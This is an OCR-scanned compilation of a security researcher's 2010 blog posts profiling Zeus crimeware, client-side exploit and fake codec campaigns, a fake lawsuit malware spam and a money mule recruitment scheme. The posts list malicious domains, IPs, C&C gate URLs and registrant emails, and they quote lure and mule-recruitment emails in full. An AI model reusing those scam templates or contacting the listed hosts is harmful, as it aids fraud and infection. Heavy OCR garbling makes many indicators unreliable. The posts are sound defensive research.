[19] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[20] Keeping Reshipping Mule Recruiters on a Short Leash 

[21] Keeping Money Mule Recruiters on a Short Leash 

[22] Standardizing the Money Mule Recruitment Process 

[23] lnside a Money Laundering Group's Spamming 
Operations 

[24] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[25] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [26]Dancho Danchev's 
blog. Follow him [27Jon Twitter. 

1. http://ddanchev.blo as pot.com/2009/ll/keepin a -mone v- 
mule-recruiters-on-short.html 

2. http://ddanchev.blo as pot.com/2010/Q2/keepin a -mone v- 
mule-recruiters-on-short.html 

3. http://ddanchev.blo as pot.com/2009/12/koobface- a an a- 
wishes-industrv-ha pp v.html 















4. https://zeustracker.abuse.ch/monitor. php? 
host= g reatuk.or g 

5. http://blo g s.zdnet.com/securit v/? p = 5508 

6. http://blo g s.zdnet.com/securit v/? p = 5508 

7. http://ddanchev.blo os pot.com/20Q9/12/celebritv-themed- 
scareware-camoai g n Q7.html 

8. http://ddanchev.blo os pot.com/20Q9/ll/koobface-botnet- 
starts-servin g -client.html 

9. http://ddanchev.blo os pot.com/20Q9/10/standardizin o- 
monev-mule-recruitment.html 

10. http://ddanchev.blo gs pot.com/2009/ll/keepin g -mone v- 
mule-recruiters-on-short.html 


11. https://zeustracker.abuse.ch/monitor. ph p?as=34305 

12. http://blo g s.zdnet.com/securit v/? p=5508 

13. https://zeustracker.abuse.ch/monitor. php? 
host= g reatuk.or g 

14. https://zeustracker.abuse.ch/monitor. php? 
host= g reatan.cn 

15. https://zeustracker.abuse.ch/monitor. php? 
host=193.104.22.71 


16. https://zeustracker.abuse.ch/monitor. php? 
host=193.104.22.90 


17. http://ddanchev.blo os pot.com/2010/03/monev-mule- 
recruiters-on-vahoos-web.html 
















































18. http://ddanchev.blo as pot.com/2010/Q2/dissectin a- 
on a oin a -monev-mule.html 


19. http://ddanchev.blo as pot.com/2010/Q2/keepin a -mone v- 
mule-recruiters-on-short.html 


20. http://ddanchev.blo as pot.com/20Q9/12/keepin a- 
reshi p pin a -mule-recruiters-on.html 

21. http://ddanchev.blo as pot.com/2009/ll/keepin a -mone v- 
mule-recruiters-on-short.html 


22. http://ddanchev.blo as pot.com/20Q9/10/standardizin a- 
monev-mule-recruitment.html 

23. http://ddanchev.blo as pot.com/2009/Q5/inside-mone v- 
launderin a-a roups-soammin a .html 

24. http://ddanchev.blo as pot.com/2008/Q7/monev-mule- 
recruiters-use-asoroxs-fast.html 

25. http://ddanchev.blo as pot.com/2008/10/monev-mules- 
s vndicate-activelv.html 

26. http://ddanchev.blo as pot.com/ 

27. http://twitter.com/danchodanchev 
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GazTransitStroy/GazTranZitStroy: 

From Scareware to Zeus Crimeware and Client-Side 
Exploits 

(2010-03-24 00:22) 

Remember 2009's GazTransitStroy/GazTranZitStroy LLC, 
[1]AS29371? 

The fake Russian gas company whose motto was " In gaz we 
trust'? It appears that in order to stay competitive within the 
cybercrime ecosystem, they are now diversifying their 
offerings from hosting scareware domains 








































and redirectors, to [2]active Zeus crimeware campaigns, next 
to client-side exploits serving campaigns used as the 
infection vector. 

• Go through previous posts detailing their activities: 

[3]GazTranzitStroylnfo - a Fake Russian Gas Company 
Facilitating Cybercrime; [4]GazTransitStroy/GazTranZitStroy 
Rubbing Shoulders with Petersburg Internet Network 

LLC 
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From last's week's active Zeus C &Cs: 














houstonhotelreal.com - 91.212.41.88 - Email: 
admin@houstonhotelreal.com 

doctormiler.com - 91.212.41.14 - Email: 
cheburaskogro@yahoo.com 

pipiskin.hk - 91.212.41.40 - Email: admin@pipiskin.hk 

lopokerasandco.hk - 91.212.41.89 - Email: 
admin@lopokerasandco.hk 

aervrfhu.ru - 91.212.41.88/109.196.143.60 - Email: samm 
_87@email.com 

updateinfo22.com - 91.212.41.60/193.148.47.60 - Email: 
moonbeam@konocti.net 

tumasolt.com - 91.212.41.123 - Email: stuns@5mx.ru 

91.212.41.80 

91.212.41.79 

91.212.41.78 

To this week's active Zeus campaigns: 

cpadm21.cn - 91.212.41.31 - Email: Dalas 
_lllarionov@yahooo.com 

doctormiler.com - 91.212.41.14 - Email: 
cheburaskogro@yahoo.com 

91.212.41.80 

91.212.41.79 


91.212.41.78 
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GazTransitStroy is still in operation, acting as route for 
malicious activity, in the very same way it was interacting 
with other cyber-crime friendly ASs (EUROHOST- 
NET/Eurohost LLC) during 2009. Let's take a quick 
snapshot of malicious activity currently taking place at 
AS29371. 

Detection rate for the Zeus crimeware phoning back 
to GazTransitStroy/GazTranZitStroy: 

- [5]Trojan.Zbot - Result: 8/41 (19.52 %) 

- [6]TROJ KRARSMDA - Result: 5/42 (11.91 %) 

- [7]Packed.Win32.Krap.ae - Result: 10/42 (23.81 %) 

Client-side exploits [8](Spammer:Win32/Tedroo.AB; 
Win32:FakeAlert-JJ - Result: 31/42 (73.81 %) serving 
do¬ 
mains/admin panels parked at 91.212.41.87: 
hvcvjxcc.cn - Email: wang9619@163.com 
fyyxqftc.cn - Email: wang9619@163.com 
qymgeejd.cn - Email: wang9619@163.com 
gjjdrgqf.cn - Email: wang9619@163.com 
gdttjkug.cn - Email: wang9619@163.com 
pgcnbgkk.cn - Email: wang9619@163.com 
xvriomwk.cn - Email: wang9619@163.com 



bfhqrmtm.cn - Email: wang9619@163.com 
cfssixsn.cn - Email: wang9619@163.com 
vxoyqgcp.cn - Email: wang9619@163.com 
hjwbxhqr.cn - Email: wang9619@163.com 
frrszqot.cn - Email: wang9619@163.com 
axaldjqt.cn - Email: wang9619@163.com 
aafoocgv.cn - Email: wang9619@163.com 
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195-88 190-30pl7ion«com 



'■ » • AS49093 


It's worth pointing out that fact that in February, a 
much more extensive portfolio of domains was 
parked on 

195.88.190.30, with a small part of them, now 
responding to GazTransitStroy/GazTranZitStroy AS: 

arufeudv.cn - Email: wang9619@163.com 





axaldjqt.cn - Email: wang9619@163.com 
bbivbblr.cn - Email: wang9619@163.com 
cfssixsn.cn - Email: wang9619@163.com 
dcueqzke.cn - Email: wang9619@163.com 
drghzeap.cn - Email: wang9619@163.com 
fqfmyvii.cn - Email: wang9619@163.com 
gjjdrgqf.cn - Email: wang9619@163.com 
gokzlykr.cn - Email: wang9619@163.com 
gwsdwxae.cn - Email: wang9619@163.com 
icnzlxyo.cn - Email: wang9619@163.com 
inkqoevl.cn - Email: wang9619@163.com 
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► 00:00 00:00 
izhdjcsu.cn - Email: wang9619@163.com 
lsggdniu.cn - Email: wang9619@163.com 
maaltsxg.cn - Email: wang9619@163.com 
mdftfxek.cn - Email: wang9619@163.com 
ntvftguu.cn - Email: wang9619@163.com 
pgcnbgkk.cn - Email: wang9619@163.com 
rbpwnrss.cn - Email: wang9619@163.com 
rzwdcsey.cn - Email: wang9619@163.com 
urybtnfb.cn - Email: wang9619@163.com 










uzfbhofi.cn - Email: wang9619@163.com 

vnvxltpr.cn - Email: wang9619@163.com 

vordquyo.cn - Email: wang9619@163.com 

xvrlomwk.cn - Email: wang9619@163.com 

ycgezkpu.cn - Email: wang9619@163.com 

ykcdffei.cn - Email: wang9619@163.com 

yvuxksuk.cn - Email: wang9619@163.com 

zdzhecim.cn - Email: wang9619@163.com 

Fake codecs serving domains parked at 91.212.41.88: 

real-time-tube.com - Email: admin@free-new-sex- 
video.com 

myusmailservice.com 

video-chronicle.com - Email: neujelivsamomdeli@safe- 
mail.net 
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yahoo-movies-online.com - Email: admin@yahoo-movies- 
online.com 

houstonhotelreal.com - Email: 
admin@houstonhotelreal.com 

sex-tapes-celebs.com - Email: wnscandals@gmail.com 
evertrands.com - Email: moldavimo@safe-mail.net 



myusmailservices.com - Email: 
admin@myusmailservices.com 

xplacex.com - Email: i.jahmurphy@gmail.com 

xsebay.com - Email: admin@xsebay.com 

exsebay.com - Email: admin@exsebay.com 

video-info.info - Email: videinfo@gmail.com 

partner777.net - Email: potenciallio@safe-mail.net 

video-trailers.net - Email: fullhdvid@gmail.com 

primusdns.ru - Email: samm _87@email.com 

aervrfhu.ru - Email: samm_87@email.com 

Sample redirection takes place through the following 
sampled domain: 

- yahoo-movies-online.com/ iframe7.php 

- real-web-tube.com/ xplay.php?id=40018 - 

59.53.91.124 

- multimediasupersite.com/ video-plugin.40018.exe - 

62.212.66.93 

Serving video-plugin.40018.exe - 

[9]W32/FakeAlert.FT.gen! El dorado - Result: 10/42 (23.81 %), 
which phones 

back to: 

yourartmuseum.com/fakbwq.php?q=RANDOM - 

66.96.219.38 - Email: davidearhart@rocketmail.com 



rareartonline.com - 64.191.44.73 - Email: 
fell ows@nonpartisan.com 

sportscararts.com - 209.159.146.234 - Email: 
cdaniels@pennsylvania.usa.com 

expressautoarts.com - 69.10.35.253 - Email: 
cdaniels@pennsylvania.usa.com 

zenovy.com/resolution.php - 66.96.222.198 

bokwer.com/borders.php - 64.120.144.119 

Domains hosting the fake codec plugin are parked at 
62.212.66.93: 

bestinternetmedia.com - Email: shoemaker@angelic.com 

supermediaworld.com - Email: shoemaker@angelic.com 

hottrackdvd.com - Email: bailey@theplate.com 

multimediatoolguide.com - Email: 
severson@therange.com 

thebettermovie.com - Email: bailey@theplate.com 

movietoolonline.com - Email: severson@therange.com 

movietoolvideo.com - Email: shann@techie.com 

movielocationinfo.com - Email: maldonado@toke.com 

bestmultimediademo.com - Email: 
mcchristian@ymail.com 

dvddatacenter.com - Email: maldonado@toke.com 
videotooldirect.com - Email: shann@techie.com 



In gaz they trust, cybercriminals I don't trust. 

This post has been reproduced from [lOJDancho Danchev's 
blog. Follow him [lljon Twitter. 

1. httPs://zeustracker.abuse.ch/monitor. ph p?as= 29371 

2. httPs://zeustracker.abuse.ch/monitor. ph p?as= 29371 

3. 

http://ddanchev.blo as pot.com/2009/Q5/ a aztranzitstrovinfo- 

fake-russian- a as.html 

4. 

http://ddanchev.blo as pot.com/2009/06/ a aztransitstro va aztra 

nzitstrov-rubbin a .html 

5. 

https://www.virustotal.com/analisis/dll01df370df904ff6e28 

b96ebl531fld7083e6e220Q73d9c9eda479e563fa77-12693 

257 


75808 

6 . 

https://www.virustotal.com/analisis/45c7dcb23000feaff0e47 

debc4ba55d7942fd62604200c3el37ec83b3b05b616-12693 

75843 

7. 

https://www.virustotal.com/analisis/1112b6b6b2ee3a4ee993 

ebe7f51fbcdf882b202aa47388697b01de60bclfff46-12693 

75852 


8 . 





























http://www.vi rustotal.com/analisis/a34a96a9bl98c9bb4c2f5 

087cfc66970ac70217c4d52f0c8445e92930f6f415b-12693 


78273 

9. 

http://www.virustotal.com/analisis/734f3168bc22cl945553ff4 

6f8f2f45f9b958d60ef26a5e027ba955ed8b77a42d-12693 

81200 


10. http://ddanchev.blo as oot.com/ 

11. http://twitter.com/danchodanchev 
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Zeus Crimeware/Client-Side Exploits Serving 
Campaign in the Wild (2010-03-24 20:29) 

[ 1 ] 

UPDATED: Friday, March 26, 2010: In a typical multi¬ 
tasking fashion like the one we've seen in previous 
campaigns, more typosquatted domains are being 
introduced, this time using the [2]well known IRS Fraud 
Application theme. 

What's worth pointing out is that, just like the "[3] 

Sea re ware, Sinowal, Client-Side Exploits Serving Spam 
Campaign in the Wild" campaign from last week, the current 
one is also launched on Friday. 

The reason? A pointless attempt by the gang to increase the 
lifecycle of the campaign. 
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- Sample URL: irs.gov.faodqt.com.pl 

/fraud.applications/application/statement, php 

- Client-side exploits serving iFrame URL: 

klgs.trfafsegh.com /index.php 

- Sample detection rate: tax-statement.exe - [4]Trojan- 
Spy.Win32.Zbot - Result: 29/42 (69.05 %), phones back to 

[5]shopinfmaster .com/cnf/shopinf.jpg 
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166 82 0 0/16 


1668278248 



Spamvertised and currently active fast-fluxed domains 
include: 


AS40676 


AS29131 


AS209 


fercca.com.pl 

fercci.com.pl 

ferkci.com.pl 




































fercki.com.pl 

foodat.com.pl 

foocit.com.pl 

forcit.com.pl 

footit.com.pl 

ferckt.com.pl 

forckt.com.pl 

foodot.com.pl 

footot.com.pl 

faodqt.com.pl 
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foodyt.com.pl 

redee3e.com 

redee3e.com.pl 

redee3e.pl 

redee3o.com.pl 

eddpiii.com.pl 

eddsiii.com.pl 

eddsiip.com.pl 


eddsiui.com.pl 

eddsiuo.com.pl 

eddsiuy.com.pl 

edduiip.com.pl 
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edduiiz.com.pl 

edduyiz.com.pl 

edouyiz.com.pl 

ekouyiz.com.pl 

Name server of notice: 

nsl.globalistory.net - 87.117.245.9 - Email: 
tompsongand@aol.com 

One of [6]TR0YAK-AS's most aggressive customers (used to 
host their Zeus C &Cs there) for Ql, 2010, is once 

again ( latest campaign is from March 12th 2010 - 
[7]Scareware, Sinowal, Client-Side Exploits Serving Spam 
Campaign in the Wild) attempting to build a crimeware 
botnet, by spamvertising the [8]well known PhotoArchive 
theme, in between serving client-side exploits using an 
embedded iFrame on the domains in question. 

[9] 

In terms of quality assurance, the campaign is continuing to 
use it's proven campaign structure. The actual pages are 


hosting a binary for manual download, in between the iFrame 
which would inevitably drop the Zeus crimeware. 

Just like in previous campaigns, the gang continues to 
exclusively [lOJregistering its domains using the ALANTRON 

BLTD. domain registrar. Let's dissect the ongoing campaign's 
structure, and expose the domains, and ASs participating in 
it. 

Sample URL/subdomain structure: 

archive.pasweq.co.kr /idl007zx/get.php? 
emai I = emai l@mail.com 

photostock, pasweq.co. kr 

archives.pasweq.co.kr 

letitbit.pasweq.co.kr 

photobank.pasweq.co.kr 

photosbank.pasweq.co.kr 

photostock, pasweq.co. kr 

Sample message: 11 Photos Archives Hosting has a zero- 
tolerance policy against ILLEGAL content. AH archives 263 
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and links are provided by 3rd parties. We have no control 
over the content of these pages. We take no responsibility 
for the content on any website which we link to, please use 
your own discretion while surfing the links. © 2007-2009, 
Photos Archives Hosting Group, Inc.- ALL RIGHTS RESERVED. 


[ 11 ] 

Sample iFrames embedded on the pages include: 
cogs.trfafsegh.com /index.php - 59.53.91.192 - Email: 
maple@qx8.ru; klgs.trfafsegh.com /index.php 
Sample iFrame campaign structure: 

- cogs.trfafsegh.com /index.php 

- cogs.trfafsegh.com /I.php 

- cogs.trfafsegh.com /statistics.php 

- klgs.trfafsegh.com /index.php 

- klgs.trfafsegh.com /I.php 

- klgs.trfafsegh.com /statistics.php 
[ 12 ] 

264 

K 

Parked on the same IP where the iFrame domain is are also 
the following Zeus C &Cs - dogfoog.net - Email: 

drier@qx8.ru; countrtds.ru - Email: thru@freenetbox.ru - 
[13]AS4134 (CHINANET-BACKBONE No.31 Jin-rong Street) 

Detection rates: zeus.js - [14]Trojan.JS.Agent.bik - 1/41 (2.44 
%) serving update.exe - [15]PWS:Win32/Zbot.gen!R - 

Result: 17/42 (40.48 %), PhotoArchive.exe - [16]Trojan.Zbot - 
Result: 18/41 (43.91 %). The client-side exploitation is 


relying on the Phoenix Exploit's Kit. 

Samples phone back to: shopinfmaster.com /cnf/shopinf.jpg - 
78.2.153.153; 75.172.92.77; 78.84.78.179; 

86.106.228.77; 

184.56.245.136; 

68.49.19.6 - Email: Duran@example.com shopinfmaster.com 
/shopinf/gate.php 

Relying on the nsl.starwarfan.net name server, which is also 
connected to other Zeus crimeware C &Cs which 

also respond the same IPs - smotril23.com - Email: smot- 
smot@yandex.ru domainsupp.net - Email: ErnestJ- 
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Booth@example.com [17] 

Active and fast-fluxed subdomains+domains participating in 
the campaign: 

pasweokz.com - Email: romavesela@yahoo.com 

pasweq.co.kr- Email: romavesela@yahoo.com 

archive.pasweokz.com 

archive, pasweq.co.kr 

archives.pasweokz.com 

archives, pasweq.co.kr 
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letitbit.pasweokz.com 

letitbit.pasweq.co.kr 

photobank.pasweokz.com 

photobank.pasweq.co.kr 

photosbank.pasweokz.com 

photosbank.pasweq.co.kr 

photoshock.pasweokz.com 

photoshock.pasweq.co. kr 

photostock.pasweokz.com 

photostock, pasweq.co. kr 

Name servers currently in use were also seen in February, 
2010 ([18]IRS/PhotoArchive Themed Zeus/Client- 

Side Exploits Serving Campaign in the Wild) 

nsl.addressway.net - 87.117.192.79 - Email: 
pool bi I l@hotmail.com 

nsl.skc-realty.com - 87.117.192.79 - Email: skc@realty.net 

Updates will be posted as soon as new developments 
emerge. Consider going through the related posts, to 

catch up with the gang's activities for Ql, 2010. 

Related posts: 



[19] Scareware, Sinowal, Client-Side Exploits Serving Spam 
Campaign in the Wild 

[20] TROYAK-AS: the cybercrime-friendly ISP that just won't 
go away 

[21] AS50215 Troyak-as Taken Offline, Zeus C &Cs Drop from 
249 to 181 

[22] Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware 

[23] Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams 

[24] PhotoArchive Crimeware/Client-Side Exploits Serving 
Campaign in the Wild 

[25] Tax Report Themed Zeus/Client-Side Exploits Serving 
Campaign in the Wild 

[26] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

This post has been reproduced from [27]Dancho Danchev's 
blog. Follow him [28Jon Twitter. 
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18. http://ddanchev.blo as pot.com/2010/Q2/irsphotoarchive- 
themed-zeusclient-side.html 
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22. http://ddanchev.blo as pot.com/201Q/01/outlook-web- 
access-themed-spam-campai a n.html 

23. http://ddanchev.blo as pot.com/201Q/01/pushdo-servin a- 
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24. http://ddanchev.blo as pot.com/2010/Q2/photoarchive- 
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26. http://ddanchev.blo as pot.com/2010/02/keeoin a -mone v- 
mule-recruiters-on-short.html 


27. http://ddanchev.blo as pot.com/ 
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Copyright Lawsuit Filed Against You Themed Malware 
Campaign (2010-03-29 17:42) 

Having just received a copy of what appears to be the last 
active domain involved in last week's "[ljCopyright Lawsuit 
filed against you" themed [2]malware campaign, it's time to 
conduct a brief assessment of its inner workings. 

Subject used: Copyright Lawsuit filed against you 

Sample message: March 24, 2010 






























Crosby & Higgins 
350 Broadway, Suite 300 
New York, NY 10013 
To Whom It May Concern: 

On the link bellow is a copy of the lawsuit that we filed 
against you in court on March 11, 2010. Currently the Pretrail 
Conference is scheduled for April 11th, 2010 at 10:30 A.M. in 
courtroom #36. The case number is 3485934. 

The reason the lawsuit was filed was due to a completely 
inadequate response from your company for copyright 

infrigement that our client Touchstone Advisories Inc is a 
victim of Copyright infrigement 

www.touchstoneadvisorsonline.com /la wsuit/suit 
_documents.doc 

Touchstone Advisories Inc has proof of multiple Copyright 
Law violations that they wish to present in court on April 
11th, 2010. 

Sincerely, 

Mark R. Crosby 

Crosby & Higgins LLP 

Detection rates: 

- complaint.doc - [3]Downloader.Lapurd - Result: 22/39 
(56.42 %) 



- complaint _docs.pdf - [4]Trojan-Clicker.Win32.Cycler.odn - 
Result: 27/42 (64.29 %) 

Samples phone back to: 

- 121.14.149.132 /fwq/indux.php?U = RANDOM DATA - 

AS4134, CHINA-TELECOM China Telecom 

- 121.14.149.132 /hia 12/ter.php?u=UserName 
&C=COMPUTERNAME &v=RANDOM DATA 
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Active C &C administration panel at: 121.14.149.132 
/hial2/sca.php - returns 11 SSL ONLY. USE HTTPS' 

Spamvertised domains involved in the campaign: 

- touchstoneadvisorsonline.com /lawsuit/suit 
_documents.doc - 72.167.232.84 

- marcuslawcenter.com /s/r439875.doc - 173.201.145.1 

- Email: info@tedvernon.com 

- danilison.com/suit /complaint.doc - 72.167.183.15 

- daughtersofcolumbus.com /suit/complaint.doc - 
ACTIVE - 173.201.97.1 - Email: charlenej@stny.rr.com 

The same phone back IP was also profiled in [5]another 
campaign from January, 2010. 

Clearly, the cybercriminals behind it are aiming to stay 
beneath the radar, by relying on not so well profiled 

malicious infrastructure, combined with newly introduced 
campaigns in an attempt to make it harder to establish 



historical connections (Read about the [6]"aggregate- 
and-forget" concept in respect to botnets/malware) 

between the rest of the their malicious activities. 

This post has been reproduced from [7]Dancho Danchev's 
blog. Follow him [8Jon Twitter. 
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Money Mule Recruitment Campaign Serving Client- 
Side Exploits (2010-03-30 18:51) 

Remember [l]Cefin Consulting & Finance, the bogus, 
money mule recruitment company that ironically tried to 
recruit me last month? 

They are back, with a currently ongoing money mule 
recruitment campaign, this time not just attempting to 

recruit gullible users, but also, serving client-side exploits 
( [2JCVE-2009-1492 ; [3JCVE-2007-5659 ) through an 
embedded javascript on each and every page within the 
recruitment site. 
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Let's dissect the campaign, expose the client-side exploits 
serving domains, the Zeus-crimeware serving domains 

parked within the same netblock as the mule recruitment site 
itself, to ultimately expose a bogus company for 

furniture hosting a pretty descriptive cv.exe that is dropped 
on the infected host. 

Initial recruitment email sent from 
financialcefin@aol.com: 

Hello, Our Company is ready to offer full and part time job in 
your region. It is possible to apply for a well-paid part time 
job from your state. More information regarding working and 
cooperation opportunities will be sent upon 


request Please send all further correspondence ONLY to 
Company's email address: james.mynes.cf@gmail.com 

Best regards 

Response received: 

Greetings, 

Cefin Consulting & Finanace company thanks you for being 
interested in our offer. AH additional information about our 
company you may read at our official site. 
www.ceffincfin.com Below the details of vacancy 
operational scheme: 

1. The payment notice and the details of the beneficiary for 
further payment transfer will be e-mailed to your box. All 
necessary instructions regarding the payment will be 
enclosed. 

2. As a next step, you'll have to withdraw cash from our 
account. 

3. Afterwards you shall find the nearest Western Union office 
and make a transfer. Important: Only your first and last 
names shall be mentioned in the Western Union Form! No 
middle name (patronymic) is written! Please check carefully 
the spelling of the name, as it has to correspond to the 
spelling in the Notice. 

4. Go back home soonest possible and advise our operator 
on the payment details (Sender's Name, City, Country, MTCN 
(Money Transfer Control Number), Transfer Amount). 

5. Our operator will receive the money and send it to the 
customer. 



6. Please be ready to accept and to make similar transfers 2- 
5 times a week or even more often. Therefore you have to be 
on alert to make a Western Union payment any time. 
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Should you face any problems incurred in the working 
process, don't hesitate to contact our operator immediately, 
if you have any questions, please do not hesitate to contact 
us by e-mail. If you have understood the meaning of work 
and ready to begin working with us, please send us your 
INFO in the following format: 

1) First name 2) Last name 3) Country 4) City 5) Zip code 6) 
Home Phone number, Work Phone number, Mo¬ 
bile Phone number 7) Bank account info: a) Bank name b) 
Account name c) Account number d) Sort code 8) Scan you 
passport or driver license 

2010 © Cefin Consulting & Finance 
AH right reserved. 

Money mule recruitment URL: ceffincfin.com - 
93.186.127.252 - Email: winter343@hotmail.com - 
[4]currently 
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flagged as malicious. 

Once obfuscated, the javascript attempts to load the client- 
side exploits serving URL click-clicker.com /click/in.cgi?3 


- 195.78.109.3; 195.78.108.221 - Email: 
aniwaylin@yahoo.com, orclick-clicker.com - 195.78.109.3 - 
Email: aniwaylin@yahoo.com. 

Sample campaign structure: 

- click-clicke.com /cgi- 

bin/plt/n006106203302 r0009R81fc905cX409b 
2ddfY0a607663Z0100f055 

Parked on the same IP (91.213.174.52) are also the following 
client-side exploit serving domains: 

click-reklama.com - Email: tahli@yahoo.com 

googleinru.in - Email: mirikas@gmail.com 

Within AS29106, VolgaHost-as PE Bondarenko Dmitriy 
Vladimirovich, we also have the following client-side 

exploits/crimeware friendly domains: 

benlsdenc.com - Email: blablaman25@gmail.com 

nermdusa.com - Email: polakurt69@gmail.com 

mennlyndy.com - Email: albertxxl@gmail.com 

kemilsy.com - Email: VsadlusGruziuk@gmail.com 

benuoska.com - Email: godlikesme44@gmail.com 
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Name server of notice nsl.ginserdy.com - 93.186.127.205 
- Email: albertxxl@gmail.com and nsl.ndnsgw.net - 


195.78.109.3 - Email: aniwaylin@yahoo.com. have been also 
registered using the same emails as the original 

client-side exploit serving domains. 

Sample detection rates, and phone back locations: 

- cefin.js - [5]Troj/IFrame-DY - Result: 1/42 (2.39 %) 

- clicker.pdf - [ 6 ] 

Exploit.PDF-JS.Gen; Exploit:Win32/Pdfjsc.EM 

- Result: 21/42 (50.00 %) 

- clicker2.exe - [7]TR/Sasfis.akdv.l; Trojan.Sasfis.akdv.l; 
Trojan.Win32.Sasfis.akdv - Result: 18/42 (42.86 %) 

- cv.exe - [8]Trojan.Siggenl.15304 - Result: 3/42 (7.15 %) 

- l.exe - [9]Suspicious:W32/Malware!Gemini - Result: 4/42 
(9.53 %) 

275 




Upon execution, the sample phones back to Oficla/Sasfis C 

&C at socksbot.com /isb/gate.php? 
magic = 121412150001 

&ox=2-5-1-2600 &tm=3 &id=24905431 
&cache=4154905385 & - 195.78.109.3 - Email: 
aniwaylin@yahoo.com which drops 
pozitiv.md/master/cv.exe - 217.26.147.24 - Email: 
v.pozitiv@mail.ru from the web site of a fake company for 
furniture (PoZITIVe SRL). 


Interestingly, today the update location has been changed to 

tds-style.spb.ru /error/1.exe. Detection rate: 

- l.exe - [10]Suspicious:W32/Malware!Gemini - Result: 4/42 
(9.53 %) 

Keeping the money mules on a short leash series, are prone 
to expand. Stay tuned! 

Related coverage of money laundering in the context 
of cybercrime: 

[11] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[12] Money Mule Recruiters on Yahool's Web Hosting 

[13] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[14] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[15] Keeping Reshipping Mule Recruiters on a Short Leash 

[16] Keeping Money Mule Recruiters on a Short Leash 

[17] Standardizing the Money Mule Recruitment Process 

[18] lnside a Money Laundering Group's Spamming 
Operations 
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[19] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[20] Money Mules Syndicate Actively Recruiting Since 2002 
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Money Mule Recruitment Campaign Serving Client- 
Side Exploits (2010-03-30 18:51) 

Remember [l]Cefin Consulting & Finance, the bogus, 
money mule recruitment company that ironically tried to 
recruit me last month? 

They are back, with a currently ongoing money mule 
recruitment campaign, this time not just attempting to 

recruit gullible users, but also, serving client-side exploits 
( [2JCVE-2009-1492 ; [3JCVE-2007-5659 ) through an 
embedded javascript on each and every page within the 
recruitment site. 
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Let's dissect the campaign, expose the client-side exploits 
serving domains, the Zeus-crimeware serving domains 

parked within the same netblock as the mule recruitment site 
itself, to ultimately expose a bogus company for 

furniture hosting a pretty descriptive cv.exe that is dropped 
on the infected host. 

Initial recruitment email sent from 
financialcefin@aol.com: 

Hello, Our Company is ready to offer full and part time job in 
your region. It is possible to apply for a well-paid part time 
job from your state. More information regarding working and 
cooperation opportunities will be sent upon 

request. Please send all further correspondence ONLY to 
Company's email address: james.mynes.cf@gmail.com 

Best regards 

Response received: 

Greetings, 

Cefin Consulting & Finanace company thanks you for being 
interested in our offer. AH additional information about our 
company you may read at our official site. 
www.ceffincfin.com Below the details of vacancy 
operational scheme: 

1. The payment notice and the details of the beneficiary for 
further payment transfer will be e-mailed to your box. All 
necessary instructions regarding the payment will be 
enclosed. 

2. As a next step, you'll have to withdraw cash from our 
account. 



3. Afterwards you shall find the nearest Western Union office 
and make a transfer. Important: Only your first and last 
names shall be mentioned in the Western Union Form! No 
middle name (patronymic) is written! Please check carefully 
the spelling of the name, as it has to correspond to the 
spelling in the Notice. 

4. Go back home soonest possible and advise our operator 
on the payment details (Sender's Name, City, Country, MTCN 
(Money Transfer Control Number), Transfer Amount). 

5. Our operator will receive the money and send it to the 
customer. 

6. Please be ready to accept and to make similar transfers 2- 
5 times a week or even more often. Therefore you have to be 
on alert to make a Western Union payment any time. 
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Should you face any problems incurred in the working 
process, don't hesitate to contact our operator immediately. 
If you have any questions, please do not hesitate to contact 
us by e-mail. If you have understood the meaning of work 
and ready to begin working with us, please send us your 
INFO in the following format: 

1) First name 2) Last name 3) Country 4) City 5) Zip code 6) 
Home Phone number, Work Phone number, Mo¬ 
bile Phone number 7) Bank account info: a) Bank name b) 
Account name c) Account number d) Sort code 8) Scan you 
passport or driver license 

2010 © Cefin Consulting & Finance 


All right reserved. 


Money mule recruitment URL: ceffincfin.com - 
93.186.127.252 - Email: winter343@hotmail.com - 
[4]currently 
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flagged as malicious. 

Once obfuscated, the javascript attempts to load the client- 
side exploits serving URL click-clicker.com /click/in.cgi?3 

- 195.78.109.3; 195.78.108.221 - Email: 
aniwaylin@yahoo.com, orclick-clicker.com - 195.78.109.3 - 
Email: aniwaylin@yahoo.com. 

Sample campaign structure: 

- click-clicke.com /cgi- 

bin/plt/n006106203302 r0009R81fc905cX409b 
2ddfY0a607663Z0100f055 

Parked on the same IP (91.213.174.52) are also the following 
client-side exploit serving domains: 

click-reklama.com - Email: tahli@yahoo.com 

googleinru.in - Email: mirikas@gmail.com 

Within AS29106, VolgaHost-as PE Bondarenko Dmitriy 
Vladimirovich, we also have the following client-side 

exploits/crimeware friendly domains: 

benlsdenc.com - Email: blablaman25@gmail.com 


nermdusa.com - Email: polakurt69@gmail.com 
mennlyndy.com - Email: albertxxl@gmail.com 
kemilsy.com - Email: VsadlusGruziuk@gmail.com 
benuoska.com - Email: godlikesme44@gmail.com 
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Name server of notice nsl.ginserdy.com - 93.186.127.205 

- Email: albertxxl@gmail.com and nsl.ndnsgw.net - 

195.78.109.3 - Email: aniwaylin@yahoo.com. have been also 
registered using the same emails as the original 

client-side exploit serving domains. 

Sample detection rates, and phone back locations: 

- cefin.js - [5]Troj/IFrame-DY - Result: 1/42 (2.39 %) 

- clicker.pdf - [ 6 ] 

Exploit.PDF-JS.Gen; Exploit:Win32/Pdfjsc.EM 

- Result: 21/42 (50.00 %) 

- clicker2.exe - [7]TR/Sasfis.akdv.l; Trojan.Sasfis.akdv.l; 
Trojan.Win32.Sasfis.akdv - Result: 18/42 (42.86 %) 

- cv.exe - [8]Trojan.Siggenl.15304 - Result: 3/42 (7.15 %) 

- l.exe - [9]Suspicious:W32/Malware!Gemini - Result: 4/42 
(9.53 %) 
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Upon execution, the sample phones back to Oficla/Sasfis C 

&C at socksbot.com /isb/gate.php? 
magic = 121412150001 

&ox=2-5-1-2600 &tm=3 &id=24905431 
&cache=4154905385 & - 195.78.109.3 - Email: 
aniwaylin@yahoo.com which drops 
pozitiv.md/master/cv.exe - 217.26.147.24 - Email: 
v.pozitiv@mail.ru from the web site of a fake company for 
furniture (PoZITIVe SRL). 

Interestingly, today the update location has been changed to 

